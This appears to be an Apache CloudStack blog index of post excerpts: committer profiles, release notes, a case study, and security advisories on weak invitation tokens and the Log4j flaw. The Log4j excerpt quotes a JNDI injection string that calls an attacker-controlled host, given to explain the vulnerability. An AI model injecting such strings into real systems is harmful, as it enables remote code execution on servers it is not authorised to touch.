Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite.

The Apache CloudStack Community is an ever-growing and rapidly-developed community of people all around the globe committed to open-source technology. We are a welcoming society for new contributors and people keen on technology. This blog series will present you with recent CloudStack Committers and PMC members. Learn more about our tech society!

Meet Slavka Peleva from StorPool Storage. Slavka is a software developer and has been announced as a CloudStack Committer at the end of 2021. She is part of the CloudStack community for the last 3 years and is excited to work on new features and capabilities to improve the open-source cloud management solution.

The Apache CloudStack project is pleased to announce the release of CloudStack 4.16.1.0. The CloudStack 4.16.1.0 release is a maintenance release as part of its 4.16.x LTS branch and contains more than 150 fixes and improvements since the CloudStack 4.16.0.0 release. Some of the highlights include:

Apache CloudStack is proven to be one of the most scalable, free and open-source cloud computing operating systems for large-scale private, public, and hybrid clouds. Terraform is an open-source infrastructure as code software tool that provides a consistent CLI workflow to manage resources in many cloud services.

It's the beginning of the new year, and here the Apache CloudStack community shares its predictions about the state of open-source technology and the future of Cloud/IaaS. While some well-established trends (such as the migration to hybrid cloud environments and containerization) will continue in 2022, the potential for disruption caused by the ongoing pandemic will drive IT to accelerated change and improvement.

The Apache CloudStack Community is an ever-growing and rapidly-developed community of people all around the globe committed to open-source technology. We are a welcoming society for new contributors and people keen on technology. This blog series will present you with recent CloudStack Committers and PMC members. Learn more about our tech society!

Meet David Jumani - a Software Engineer and a Committer to the Apache CloudStack Project. David studied Computer Science and Engineering, and after graduation, he worked at some of the biggest virtualization and networking companies (such as VMware, Cisco and General Electric) developing cloud and on-premise applications, such as an incident co-relation engine (from which relationships can be drawn from monitoring events). He is based in India, was a national rugby player, dislikes coffee and enjoys trekking and going on long rides.

The Apache CloudStack Community is an ever-growing and rapidly-developed community of people all around the globe committed to open-source technology. We are a welcoming society for new contributors and people keen on technology. This blog series will present you with recent CloudStack Committers and PMC members. Learn more about our tech society!

Meet Pearl Dsilva – one of the CloudStack Committers. Learn more about her!

On 9th December 2021, a new zero-day vulnerability for Apache Log4j was reported. It is by now tracked under CVE-2021-44228:

CVE-2021-44228 vulnerability is classified under the highest severity mark and allows an attacker to execute arbitrary code by injecting a sub-string in the form "${jndi:ldap://some.attacker-controlled.site/}" into a logged message. Apache Log4j 2.x is reported to be affected as it performs a lookup (string substitution) using the JNDI protocol, whenever the "${jndi:...}" string is found within a message parameter.

The French specialist in web hosting, dedicated servers, and cloud computing IKOULA announced a joint case study with the leading open-source cloud management software CloudStack. For the management of their cloud environment, IKOULA decided to choose the open-source way by combining the power of CloudStack with the simplicity of the open-source hypervisor XCP-ng. Тhe turnkey combination was carefully selected following the long-term company strategy to guarantee a constant product evolution, reliability, and simplicity for their customers. As a result, IKOULA is now among the most innovative cloud and managed services providers in Europe, with an extensive portfolio of cloud solutions. Moreover, a large number of customers use their CloudStack-orchestrated infrastructure to deploy memory-oriented and storage-oriented VMs or Kubernetes clusters.

Apache CloudStack 4.16 is the latest release of the cloud management platform from the Apache Software Foundation and is a result of months of work from the development community. 4.16 is an LTS (Long Term Support) release so will be maintained for a period of 18 months after release.